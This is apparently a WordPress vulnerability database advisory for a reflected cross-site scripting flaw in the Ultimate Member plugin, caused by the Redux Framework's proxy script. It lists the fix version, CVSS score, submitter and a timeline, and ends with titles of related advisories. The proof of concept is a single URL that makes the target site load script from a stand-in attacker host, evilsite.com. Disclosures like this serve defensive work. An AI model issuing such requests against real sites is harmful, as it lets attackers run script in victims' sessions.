Ultimate Member 1.2.98-1.2.994 – Reflected Cross-Site Scripting (XSS)

Description

The Ultimate Member plugin utilizes the Redux Framework. The Redux Framework includes a script named ‘class.p.php’, which acts as a HTTP proxy.

Utilizing this script, it is possible to trigger a Reflected XSS attack, by loading data from a location controlled by the attacker. The data from this location is then output on the target domain, and as such JavaScript is executed under the context of the current user of the site.

Proof of Concept

http://www.example.com/wp-admin/admin-ajax.php?action=redux_p&url=http://evilsite.com/xss-payload.html

Affects Plugins

ultimate-member

Fixed in 1.2.995

References

URL

https://g0blin.co.uk/g0blin-00056/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

CVSS

5.4 (medium)

Miscellaneous

Submitter

James Hooker

Submitter website

https://research.g0blin.co.uk

Submitter twitter

g0blinResearch

Verified

WPVDB ID

3b6a5da0-511d-46f7-9b55-64d771b633a7

Timeline

Publicly Published

2015-06-18 (about 10 years ago)

Added

2015-06-18 (about 10 years ago)

Last Updated

2020-08-12 (about 5 years ago)

Other

Published

Title

Published

2020-01-15

Title

YOP Poll < 6.1.2 - Reflected Cross-Site Scripting

Published

2025-08-22

Title

Ogulo – 360° Tour < 1.0.13 - Authenticated (Contributor+) Stored Cross-Site Scripting via slug Parameter

Published

2024-04-25

Title

ColorNews < 1.2.7 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-04-18

Title

Themesflat Addons For Elementor < 2.2.6 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2014-08-01

Title

IndiaNIC Testimonial 2.2 - iNIC_testimonial_save Action Multiple Parameter XSS